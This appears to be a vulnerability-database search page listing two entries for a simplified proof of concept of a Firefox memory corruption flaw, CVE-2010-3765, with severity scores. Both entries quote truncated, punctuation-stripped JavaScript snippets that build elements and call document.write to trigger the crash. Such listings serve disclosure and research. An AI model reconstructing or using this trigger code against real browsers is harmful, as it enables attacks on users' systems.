2 matches found
Firefox Memory Corruption Proof of Concept (Simplified)
No description provided by source. Hi there, For those who still do not know .. The proof of concept that I have extracted for CVE-2010-3765 is the following: htmlbody script function Gstr var cobj=document.createElementstr; document.body.appendChildcobj; cobj.scrollWidth; function crashme...
9.3CVSS0.6AI score0.83279EPSS
SaveExploits18
Mozilla Firefox - Simplified Memory Corruption (PoC)
Hi there, For those who still do not know .. The proof of concept that I have extracted for CVE-2010-3765 is the following: function Gstr var cobj=document.createElementstr; document.body.appendChildcobj; cobj.scrollWidth; function crashme document.write"fooFOO"; G"a"; document.write"a"; G"base";...
9.8CVSS8.2AI score0.83279EPSS
SaveExploits18
20